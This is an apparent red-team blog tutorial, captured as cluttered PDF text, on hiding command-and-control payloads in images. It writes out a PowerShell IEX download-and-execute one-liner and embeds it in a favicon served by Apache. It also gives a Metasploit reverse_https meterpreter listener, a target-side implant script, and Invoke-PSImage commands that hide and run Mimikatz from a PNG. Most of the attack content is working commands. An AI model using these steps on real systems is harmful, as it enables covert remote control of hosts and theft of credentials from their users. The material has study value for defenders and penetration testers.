Penetration Testing Lab

Articles from the Pentesting Field

Home Pentesting Distros Resources Submissions Toolkit Contact the Lab

Microsoft Office – NTLM Hashes via Frameset Search the Lab

Search...
Command and Control – Web Interface

Author
January 2, Command and Control – Images
2018
netbiosX Red Team C2, Command and Control, Red Team Leave a comme

netbiosX
Images traditionally have been used as a method of hiding a message. It is possibly for
forensic investigators the oldest trick in the book to search for evidence inside that type of
files. However in offensive security and red teaming pictures can hide commands, Follow PenTest Lab
payloads and scripts.
Enter your email address to follow this blog and
Michael Scott developed a python script which can generate an icon image and embed receive notifications of new posts by email.
into this image a PowerShell command. The first step is to write the command into a text
file. Join 1,667 other followers

1 echo 'IEX((new-object net.webclient).downloadstring("http://19 Enter your email address

Follow

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Recent Posts
Command and Control – Browser
SPN Discovery
Situational Awareness
Lateral Movement – WinRM
AppLocker Bypass – CMSTP
Favicon – Embedded Command

The next step is to create the favicon which will contain the embedded payload, start the Categories
apache web server and move the icon to a web server directory.
Coding (10)
1 python create_favicon.py shellcode.txt evil.png Defense Evasion (20)
2 service apache2 start
3 mv evil.png /var/www/favicon.ico Exploitation Techniques (19)
External Submissions (3)
General Lab Notes (21)
Information Gathering (12)
Infrastructure (2)
Maintaining Access (4)
Mobile Pentesting (7)
Network Mapping (1)
Post Exploitation (12)

Generation of Favicon Privilege Escalation (14)

Red Team (27)
Metasploit module multi/handler can be used to receive the connection once the Social Engineering (11)
command is executed on the target host. Tools (7)

1 use exploit/multi/handler VoIP (4)

2 set payload windows/meterpreter/reverse_https Web Application (14)
3 set LHOST XXX.XXX.XXX.XXX
4 set LPORT 443 Wireless (2)

Archives

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 June 2018
May 2018
April 2018
January 2018
December 2017
November 2017
October 2017
September 2017
Metasploit – Multi Handler Module for Favicon August 2017
July 2017
The Get-FaviconText PowerShell script will download the icon into a temporary directory June 2017
and it will convert the pixels back to characters in order to execute the payload command.
May 2017
1 Import-Module .\readFavicon.ps1 April 2017
2 Get-FaviconText -URL http://192.168.1.171/favicon.ico -WriteTo
March 2017
February 2017
January 2017
November 2016
September 2016
February 2015
January 2015

Implant – Favicon Configuration July 2014

April 2014
The Get-FaviconText script is actually the implant which needs to be executed on the June 2013
target. Even if permissions are not set on the web directory to access this file the payload May 2013
command inside the icon will still run. April 2013
March 2013
February 2013
January 2013
December 2012
November 2012
October 2012

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 September 2012
August 2012
July 2012
June 2012
April 2012
March 2012
February 2012
Implant – Favicon

A Meterpreter session will open and the target can be controlled through Metasploit. @ Twitter
#BSidesLDN2018 was great so far! Many thanks to
@dradisfw for the ticket #dradis #greatproduct
6 hours ago
Great talk by @john_shier about Dark Web!
#BSidesLDN2018 https://t.co/1yC8lVKn3X
7 hours ago
RT @myexploit2600: I be talking at 14:00 in track 2
@BSidesLondon #BsidesLDN2018 7 hours ago
Finally a social engineering talk #BSidesLDN2018
https://t.co/jMMk4lvbcH 7 hours ago
[New Post] Command and Control - Browser
pentestlab.blog/2018/06/06/com… #pentestlab
Meterpreter via Favicon
#Redteam 9 hours ago

However it is also possible to use other types of images such as JPG in order to embed Follow @netbiosX
not just commands but full PowerShell scripts in order to perform various other post
exploitation activities. Barrett Adams developed a PowerShell module that can use pixels
of a PNG file to embed a PowerShell script. This module will also generate an oneliner Pen Test Lab Stats
command for execution:
3,030,594 hits
1 Import-Module .\Invoke-PSImage.ps1
2 Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\77.jpg
Blogroll

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Packetstorm Exploits,Advisories,Tools,Whitepapers
0
Metasploit Latest news about Metasploit Framework
and tutorials 0
0x191unauthorized Tutorials 0
The home of WeBaCoo Information about the
Embedding Mimikatz in PNG – Web Version WeBaCoo and other tutorials 0
Command Line Kung Fu Command Line Tips and
Executing the oneliner will result of running Mimikatz through a PNG file that is stored on a Tricks 0
web server.

Exploit Databases
Exploit Database Exploits,PoC,Shellcodes,Papers
0
Metasploit Database Exploit & Auxiliary Modules 0
Inj3ct0r Database Remote,Local,Web
Apps,Shellcode,PoC 0

Mimikatz via PNG over the Web

Pentest Blogs
Alternatively this script can generate an oneliner for an image that is hosted locally.
Carnal0wnage Ethical Hacking Tutorials 0
1 Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\77.jpg
Coresec Pentest tutorials,Code,Tools 0
Notsosecure From Pentesters To Pentesters 0
Pentestmonkey Cheatsheets,Tools and SQL
Injection 0
Pentester Web Application Testing,Tips,Testing
Tools 0
Packetstorm Exploit Files 0
Embedding Mimikatz in PNG – Local Version
room362 Blatherings of a Security Addict 0

Running the command will execute Mimikatz from the PNG file. darkoperator Shell is only the Beginning 0
Irongeek Hacking Videos,Infosec Articles,Scripts 0

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Professional
The Official Social Engineering Portal Information
about the Social Engineering Framework,Podcasts
and Resources 0

Next Conference
Mimikatz via PNG – Local

Security B-Sides London

April 29th, 2014
Conclusion
Images can be used to execute shellcode and scripts and perform other activities. There is The big day is here.
a limitation in the number of characters that can be used therefore only images with a lot of
pixels can carry a script. It is an interesting method of hiding payloads in plain sight and a
type of threat that it could be prevented if PowerShell was disabled across the network.
Facebook Page
References
Penetrati…
9.9K likes
https://github.com/et0x/C2
http://rwnin.net/?p=35
https://github.com/peewpw/Invoke-PSImage
Like Page

Be the first of your friends to

like this

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Advertisements Advertisements

Rate this:

Rate This

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Share this:

 Twitter  Facebook 64  LinkedIn  Pinterest

 Reddit  Tumblr  Google

Like
Be the first to like this.

Related

Command and Control - Lateral Movement - Command and Control -

Browser WinRM JavaScript
In "Red Team" In "Red Team" In "Red Team"

Leave a Reply

Enter your comment here...

Microsoft Office – NTLM Hashes via Frameset

Command and Control – Web Interface

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Blog at WordPress.com.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD